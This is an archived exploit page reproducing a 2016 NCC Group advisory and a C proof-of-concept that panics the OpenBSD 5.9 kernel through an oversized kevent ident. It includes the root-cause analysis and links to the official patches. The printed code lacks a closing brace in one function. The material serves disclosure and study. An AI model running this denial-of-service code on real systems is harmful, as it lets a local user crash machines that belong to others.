OpenBSD 5.9 kernel panic through the kevent system call Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

OpenBSD 5.9 kernel panic through the kevent system call Exploit

来源：vfocus.net 作者：vfocus 发布时间：2016-07-18

/*

* kevent_panic.c

* Demonstrate a panic through the kevent system call.

*

* gcc -g kevent_panic.c -o kevent_panic

*/

#ifdef BUG_WRITEUP //---------------------------------------------------

kevent with large ident can lead to a panic

Impact:

Any logged in user can use kevent to panic the kernel.

Description:

When processing a kevent system call, kqueue_register() is called

for each of the changes in the user-provided change list. When

processing changes with a filter of EVFILT_READ, kqueue_register()

creates a new knote, attaches the user-provided kevent (the change)

to it, and calls knote_attach(). This function resizes an internal

fdp->fd_knlist based on the value stored in kn->kn_id (which is

really kn->kn_kevent->ident). This field is from the user-provided

kn->kn_kevent value and can be arbitrary. The relevant code is:

if (fdp->fd_knlistsize <= kn->kn_id) {

size = fdp->fd_knlistsize;

while (size <= kn->kn_id)

size += KQEXTENT;

list = mallocarray(size, sizeof(struct klist), M_TEMP,

M_WAITOK);

If the original ident value is overly large, the value of "size" will

be correspondingly large, and can trigger an assertion in mallocarray().

This can be abused by any user to cause a kernel panic.

Reproduction:

Run the attached kevent_panic.c program. It will cause a panic such as

"panic: mallocarray: overflow 18446744071562067968 * 8". (Here the

value 18446744071562067968 is ffff.ffff.8000.0000 and was caused

by sign-extension of the "int size" variable when passing it in to

the "size_t nmemb" argument of mallocarra()). NCC Group was

able to reproduce this issue on OpenBSD 5.9 release running amd64.

Recommendation:

Validate the ident field of items in the change list. Return

an error when adding a change with an overly large ident field.

This can be done in knote_attach() or earlier in kqueue_register()

or sys_kevent().

Reported: 2016-07-13

Fixed: http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/kern/kern_event.c.diff?r1=1.72&r2=1.73

http://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/019_kevent.patch.sig

http://ftp.openbsd.org/pub/OpenBSD/patches/5.8/common/022_kevent.patch.sig

#endif // BUG_WRITEUP ---------------------------------------------------

#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <sys/types.h>

#include <sys/event.h>

void xperror(int cond, char *msg)

{

if(cond) {

perror(msg);

exit(1);

}

int main(int argc, char **argv)

{

struct kevent chlist[1];

int x, kq;

kq = kqueue();

xperror(kq == -1, "kqueue");

memset(chlist, 0, 1 * sizeof chlist[0]);

chlist[0].ident = 0x20000000000000;

chlist[0].filter = EVFILT_READ;

chlist[0].flags = EV_ADD;

x = kevent(kq, chlist, 1, 0, 0, 0);

xperror(x == -1, "kevent");

printf("no crash!\n");

return 0;

}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告